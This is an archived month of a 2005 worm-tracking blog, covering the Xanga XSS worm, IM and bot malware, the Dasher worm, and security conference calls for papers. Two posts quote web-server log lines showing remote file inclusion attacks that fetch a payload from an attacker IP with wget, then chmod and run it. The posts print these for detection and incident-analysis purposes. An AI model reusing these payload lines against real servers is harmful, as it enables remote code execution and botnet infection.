« November 2005 | Main | January 2006 »

Xanga Website XSS Worm, and IM Worm Using the WMF Attack

It looks like another social gathering site, Xanga, has been hit by an XSS worm. Xanga is a blogging site popular with middle school kids, think of it as LiveJournal for the younger masses. From: Xanga Hit By Script Worm from the always great SecuriTeam blog:

The worm consists of a simple HTML/script combination, and is highly primitive in nature. The worm propagates by using the XMLHTTP interface in some browsers to create worm-infected posts on the xanga weblogs of users who visit an infected site while signed in. This approach blurs the line between worm and old-style file infecting viruses. I’ll refer to it as a worm for clarity, since most of the literature on the recent MySpace attack uses the same term. Of particular note is that the worm is ‘dumb’ — it will repeatedly repost itself to previously-infected sites. The attack is extremely noisy, with each post carrying the malware’s obnoxious message.

Aside from the fact that such immature and badly-written messages as the one dropped by the worm would already stand out on most xanga blogs (that I care to read, anyway), the incessant reposting as the worm spread more than likely caused serious clogging. As a result, this worm’s life was extremely short. It is already over as you’re reading this analysis.

It appears upon further research that this worm was a variant of the similar Exodus worm that went quietly and unnoticed on December 19th. It was only in researching this outbreak that I saw the reports of Exodus. It appears that neither worm was written by a very skilled individual, as both strains are easily uprooted, browser-specific, badly-structured, trivially-decoded, and unnecessarily bloated. The worm is technically unimpressive (particularly vis-a-vis Exodus) and is a feat on par with the scores of VBSWG tweaks and edits following the infamous “Kournikova” worm outbreak of 2001.

In other news, I haven't commented on the WMF thing this week, but it looks like someone has gone and mashed up the IM worm space with an infected link via the normal IM link-spamming technique. This one is detected as an SDBot variant and appears to use the Kelvir IM-worm codebase, and affects the MSN network. You can find some analysis on the Kaspersky Lab Weblog: More on WMF exploitation. Both the F-Secure blog and the Kaspersky weblog have had great writeups, and so has the MoMusings blog, which has a concise, clear and accurate description of the situation.

December 31, 2005 in IM worms, new trends, new worms | Permalink | Comments (7)
Tell others: digg submit del.icio.us this

Internet Worms: Walking on Unstable Ground

Another "it could get much worse" kind of thing, this one is a SANS practical.
Each day, worms are becoming a more common occurrence on the Internet. As the incidents increase, we must be thinking proactively in order to lessen the negative effects these worms have on the Internet community. It is important to remember that the livelihood of many businesses is based on an Internet presence.

The monetary losses incurred by businesses relating to these worms are hard to measure. Some estimate losses for each occurrence to be around $1 billion. 1 The true value of damages may never be known. Many companies prefer not to publicly report losses since they do not want to diminish customer confidence in their services.

So far, we have been lucky. There has not been a worm that caused widespread permanent damage to computers. Everything we have seen so far has been related to some sort of denial of service. In order to prepare for the future, we need to be thinking ahead to beat worm writers before they release the next worm onto the Internet. The worms we have seen so far have been fairly sloppy. Most propagate slowly, giving system administrators a chance to catch up on their security practices prior to any major damage taking place.

Source: Internet Worms: Walking on Unstable Ground, by Jon Maurer.

December 31, 2005 in papers | Permalink | Comments (0)
Tell others: digg submit del.icio.us this

Bot Software Spreads, Causes New Worries

2005 has definitely been the year of the bot, bigger and badder than any other year. And since a bot's often delivered by a worm, it fits here, too. Been up to my neck in WMF associated malware the past couple of days, but nothing I saw was a worm (it was all manually driven).
Zombies attack! Bot software sounds a bit like a low-budget horror movie, but it's quietly making trouble and stealing data right now, using millions of PCs worldwide. These malicious pieces of code, often compared to an undercover army of robots, invade a PC and use its computing power to do someone else's dirty work most often without the PC owner's knowledge.

The infected PC, known as a zombie, becomes another node on a bot network, typically 2,000 to 10,000 PCs strong, according to Symantec. Unfortunately, a bot network proves a practical tool for people who want to spread PC viruses and worms, send spam emails, install spyware on PCs, or carry out denial-of-service attacks on particular Web sites.

Technology publications have been buzzing about the bot threat ever since a flavor called Agobot took a fast ride through the Internet in April, finding its way into PCs thanks to a Windows operating system vulnerability. Security experts warn that large networks of Agobot-infected PCs now sit at the ready, waiting for directions. Have the risks been overblown, or do bots deserve special scrutiny?

Source: Bot Software Spreads, Causes New Worries, by Laurianne McLaughlin, in IEEE DISTRIBUTED SYSTEMS ONLINE 1541-4922 © 2004 Published by the IEEE Computer Society, Vol. 5, No. 6; June 2004.

December 30, 2005 in new trends, papers | Permalink | Comments (0)
Tell others: digg submit del.icio.us this

New PHPBB Malware?

I've been seeing Apache logfile marks that suggest that there is some new PHPBB malware on the loose, meaning it's not just manual attacks but automated. A couple of days after this started (the first dates I see are around December 11, then picking up again on about December 21 or 22) a new phpBB exploit appeared. I'm not entirely sure if this exploit is related to any malware that may be using it, but this appear to be the trails of it left in an Apache logfile: 

xxx.xxx.62.7 - - [27/Dec/2005:05:57:09 -0500] "GET 
/modules/coppermine/themes/default/theme.phptheme.php?THEME_DIR=
http://209.136.48.69/cmd.gif?&cmd=
cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  
HTTP/1.1" 404 258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

The filenames vary, but so far I've seen "micu", "cback", "listen", "criman", and "cbac". The "cmd.gif" file (also seen as "tool25.dat") is a PHP script that includes some Javascript, as well. This lets the machine act as a command proxy for the client.

A source tells me it may be a new variant of the Santy worm, but this one may use MSN Search to find its victims. Previous versions of the Santy worm used Google to search for potential victims.

Consider this a request for information. If anyone has a copy of "micu" or "cbac", please share if you could ...

December 27, 2005 in new worms | Permalink | Comments (305)
Tell others: digg submit del.icio.us this

IM worms: A 2005 review

2005 has been a busy year for IM-based worms as the table below shows. So far the state of the attack seems to be link spamming over AIM, and this trend doesn't look to stop. Consider this to be the same developmental stage as the late 1990's for e-mail based worms - no client side vulnerability attacks with specific exploits, just spamming and hoping someone is dumb enough to click.

Date First Seen Latest Date Seen Threat Family Name IM Networks Affected Brief description
January, 2005 January, 2005 MyDoom.AL (a variant of the mass mailer family) ICQ Link spamming, joins a botnet
January, 2005 February, 2005 Bropia MSN Messenger Link spamming
February, 2005M February, 2005 Aimdes AIM Link spamming
March, 2005 December, 2005 Kelvir MSN Messenger Link spamming, downloads a Spybot variant
April, 2005 May, 2005 Picrate AIM Link spamming, downloads a Spybot variant, and joins a botnet
April, 2005 July, 2005 Opanki AIM Link spamming, downloads a Spybot variant, and joins a botnet
April, 2005 August, 2005 Chod MSN Messenger Link spamming, installs spyware, joins a botnet
April, 2005 April, 2005 Velkbot AIM, Yahoo!, MSN Messenger Link spamming, installs spyware, joins a botnet
April, 2005 April, 2005 Gabloliz AIM Link spamming, joins a botnet
May, 2005 May, 2005 Pinkton AIM Link spamming
May, 2005 May, 2005 Doyorg AIM Link spamming, joins a botnet
August, 2005 August, 2005 Guapim AIM, MSN Link spamming, downloads a Spybot variant
October, 2005 October, 2005 Loxbot AIM Link spamming, joins a botnet
November, 2005 November, 2005 Yimper AIM, Yahoo! Link spamming
December, 2005 December, 2005 Santa AIM, ICQ, MSN, Windows Messenger, Yahoo! Link spamming related to holiday activity. Malicious software and a rootkit is downloaded and installed.
December, 2005 December, 2005 Dinoxi AIM Link spamming, joins a botnet
December, 2005 December, 2005 Myspace AIM Link spamming, some user interactivity

So, what can you do to stop this? Again, taking the network-centric approach, run your own message router or a proxy and look for the out degree of the clients (ie how many people they try and contact in a short period of time), look for self similar messages, and throttle the message rate. eWeek covered some of this and more in IM Threats: The Dark Side of Innovation, an article on defense measures against IM-based attacks.

December 24, 2005 in IM worms, new trends | Permalink | Comments (2)
Tell others: digg submit del.icio.us this

Two Minor Worms of Note: Kaiten, Santa

It's Thursday, and that must mean some more worms on the loose. Two relatively minor worms of note if only just to evaluate the state of the attack these days.

First up is the newer variant of the Linux Mambo worm in the wild. Mambo has an arbitrary command execution vulnerability which is exploited by the worm to fetch the kickoff script for the worm. If you've been attacked, you will see loglines like this:  

index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=
&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?
&cmd=cd%%20/tmp;wget%%20209.136.48.69/micu;chmod%%20744%%20micu;./micu;

It looks like the download site (209.136.48.69) has been disabled, but it was up earlier this morning (which helped to delay me posting this information). The worm installs two components. The first, mare, is Mambo attack vector. The second is a variant of the Kaiten bot. This variant connects to the IRC servers us.undernet.org and eu.undernet.org and can launch the standard suite of DDoS attacks. The callgraph to this component, named "ro" in this instance, is graphed here. So, what's the state of the hack? Pretty lousy, to be honest, even worse than the Linux Slapper worm from 2002 or so. Instead of building one big binary, the worm fetches a Bash script which in turn fetches two more binaries and launches them. It would have been easier to fetch the malware from the attacking node (and not a central site) and bundle it all in one executable.

The second thing making the rounds today is a new IM worm. I've spent part of the day building a chart of IM worm activity for 2005 which I plan to post tomorrow. But, right now, the Santa worm is the new kid on the block. Unlike past IM worms which have stuck to one or two networks, this one affects users of the following major IM networks: AOL, MSN Messenger, Yahoo!, and ICQ. I didn't find another IM worm that used all four major networks in the past year, so this is probably the most interesting thing about this worm. Other than that, it spams potential victims with links, installs a rootkit, and can steal information from an infected machine.

Nothing too major, but some stuff worth noting. Seems like everyone wants their own worm this year.

December 22, 2005 in IM worms, new worms | Permalink | Comments (1)
Tell others: digg submit del.icio.us this

15th EICAR Annual Conference Call for Papers

The 2006 EICAR conference, which will be held 29 April through 2 May 2006 in Hamburg, Germany, has a few days left in their call for papers. From the CFP, relevant (to Wormblog readers) topics include:
  • Side effects of malicious code
  • Viruses and worms
  • Vulnerabilities
  • e-Crime and e-Forensics
  • Legal, Privacy and Social Issues of ICT Security
  • Intrusion Detection and Prevention
Please note that the industry paper submission track has closed, and academic papers are sitll being accepted. This is how they describe what they're looking for:
Academic, peer reviewed papers - these papers will be peer reviewed by members of the program committee and other independent reviewers (where necessary) and published in the edited conference proceedings with ISBN and on conference CD-ROM. Case studies, research in progress and full research papers will be considered for the inclusion in the conference program and published proceedings. There is no definitive word limit for the submissions; however, it is anticipated that submissions will be between 3500 and 5500 words. The program committee will not accept research proposals for submission to the conference.
Important dates:
  • Academic paper submissions due: 13 January 2006
  • Poster submissions due: 24 February 2006
  • Notification to authors for academic papers: 11 February 2006
  • Notification to authors for poster submissions: 3 March 2006
Link: EICAR 2006 website

December 21, 2005 in events | Permalink | Comments (0)
Tell others: digg submit del.icio.us this

VB2006 call for papers

The call for papers for VB2006 is now open. It runs through the 9th of March, 2006. From the CFP:

The following is a list of suggested topics elicited from attendees at VB2005. Please note that this list is not exhaustive, and papers on these and any other anti-malware and spam-related subjects will be considered.

Technical AV

  • Malware collection tools/honeypots
  • Malware classification tools
  • Spyware/adware - definition, techniques and detection
  • Malware with respect to cryptography
  • Threats and protection for mobile devices
  • Emulation, engine level sandboxing, unpacking techniques
  • Rootkits
  • x64 malware
  • Malware on non-Windows platforms
  • Emulators/heuristics/PE unpacking on non-Windows platforms
  • Hardware anti-malware solutions
  • Tools of the trade (deobfuscation, IR, etc.)
  • Behavioural analysis and detection
  • Proof of concept demonstrations
  • Phishing
  • Latest malware outbreaks
  • PDF threats
  • Wireless security
  • CERT/vendor cooperation
  • Hardware supported virtualisation
Corporate AV

  • Case studies
  • Best practices
  • Policy enforcement
  • Vulnerability assessment
  • Risk management
  • Phishing & fraud in the corporate environment
  • Spyware/adware in the corporate environment
  • Online crime prevention
  • Tracing malware authors/perpetrators
  • Anti-virus & anti-spyware performance testing
  • Educating users
  • Management of anti-virus infrastructures
  • Proactive detection mechanisms
  • IDS/IPS
  • False positive prevention
  • Government security policies
  • IT outsourcing and associated risks
  • Mobile threats
  • Anti-malware managed services

How to submit a paper

Abstracts of approximately 200 words must be sent as plain text files to editor@virusbtn.com no later than Thursday 9 March 2006. Submissions received after this date will not be considered. Please include full contact details with each submission.

VB2006 will take place October 11-13 2006 at the Fairmont The Queen Elizabeth, Montréal, Québec, Canada.

December 20, 2005 in events | Permalink | Comments (0)
Tell others: digg submit del.icio.us this

DIMVA 2006 - Call for Papers

The 2006 DIMVA workshop is going to be held in Berlin, Germany from July 13 - 14, 2006. According to the call for papers:

The special interest group Security - Intrusion Detection and Response (SIDAR) of the German Informatics Society (GI) organizes DIMVA as an annual conference that brings together experts from throughout and outside of Europe to discuss the state of the art in the areas of intrusion detection, malware detection, and vulnerability assessment. DIMVA invites three types of submissions:

  • Full papers of up to 20 pages, presenting novel and mature research   results. Full papers will be reviewed, and papers accepted for   presentation at the conference will be included in the proceedings. The   proceedings are planned to appear in Springer's Lecture Notes in Computer   Science (LNCS) series.
  • Industry papers of up to 10 pages, describing best practices, case   studies, lessons learned, or latest product developments. Industry papers   will be reviewed and, if accepted for presentation at the conference,   published on the DIMVA 2006 Web site.
  • Proposals of two-to-three-hour tutorials on topics of current or emerging   interest. Tutorial proposals must not exceed 3 pages. They must clearly   identify the intended audience, include a brief biography of the speaker,   and contain sufficient material to provide a sense of their scope and   depth. Tutorial material will be published on the DIMVA 2006 Web site.

The scope of DIMVA is broad and includes, but is not restricted to the following areas:

Vulnerability Assessment:

  • Vulnerabilities and exploitation techniques
  • Vulnerability detection
  • Avoidance of vulnerabilities and software testing
  • Reverse engineering
  • ROI on vulnerability assessment and management

Intrusion Detection:

  • Intrusion techniques
  • Intrusion detection and event correlation
  • Intrusion response and intrusion prevention
  • Benchmarking of intrusion detection and prevention systems
  • Incident management and response

Malware:

  • Malware techniques
  • Malware detection
  • Malware prevention
  • Benchmarking of malware detection and prevention systems
  • Computer and network forensics

DIMVA particularly encourages papers that discuss the technical as well as the organizational integration of vulnerability, intrusion and malware detection techniques and systems for large-scale communication and enterprise networks.

Important dates:

  • January 13, 2006: Deadline for submission of full and industry papers.
  • March 3, 2006: Deadline for submission of tutorial proposals.
  • March 22, 2006: Notification of acceptance or rejection.
Link: DIMVA 2006 website.

December 19, 2005 in events | Permalink | Comments (0)
Tell others: digg submit del.icio.us this

Dasher Analysis and Thoughts

Some thoughts on the new Dasher worm that's spreading.

First, I've had a chance to look at all thre variants of the worm and reverse engineer the actual code. A big thank you to some research partners for the binaries. Having looked at the operations the worm is doing, it's obvious that it's been put together in a very haphazard fashion. The main driver of the worm actually writes a batch file that gets executed, the actual exploit code and the actual scanner are not married as code. As such, it has to be coordinated by a process (Sqltob.exe) to launch the scanner process and manage the exploit process (or processes). No one even stripped out Swan's happy little printf() statements in the code! This is a very amatuer effort on the basis of the reverse engineering.

Secondly, the worm is using a central distribution point to send out the worm binaries. The tradeoffs here are mostly obvious. As a benefit, the worm master can update the binaries here and inject new exploits or new capabilities, or just bugfixes, quite handily. It may not affect the existing worm infected systems (unless they actually poll or are connected to a worm master controlled site), but that can be sufficient. If you think about it as a seeded base from which to launch a new, improved worm, that's quite an obvious benefit. The risk inherent in this is also obvious, namely that it's easy to either shut down or begin blocking access to this central distribution site. You can block a domain name or even a 2LD, an IP address, or a port and achieve most of the blocking you need to. Pretty easy to shut this one down, as happened with Dasher.A. Dasher.B and C recycle the same master fetch site. Why someone hasn't yet repackaged the worm to send the payload from the attacker to the victim is beyond me, assuming they were capable of it.

Thirdly, the worm is clearly being worked on. It's been shown that you can get an effective worm installed (some stats I've seen suggest a couple thousand hosts worldwide are infected by this worm) using the MSDTC exploit, but it's already been augmented with three older vulnerabilities: UPNP/LSASS, MS SQL, and the WINS exploit. So, this is going to see some more work before it goes away, and we'll probably see the MSDTC exploit code rolled into the various flavors of RBot, SDBot, and such in the next few days (if you're not seeing it already).

Keep in mind it's not usually the best and brightest of the attackers who write worms, which means it's usually pretty easy to analyze these things and shut them down. While there's been great effort put forth to make stealthy, polymorphic, and difficult to analyze malware, it rarely gets used in the wild on a global scale. For the forseeable future, we're going to see worms like Dasher get launched, and we're going to have to shut them down the same way we always do.

If you haven't patched your MSDTC holes yet, go do so. If you can't, make sure you block port 1025 to those systems.

December 18, 2005 in dasher, editorial | Permalink | Comments (2)
Tell others: digg submit del.icio.us this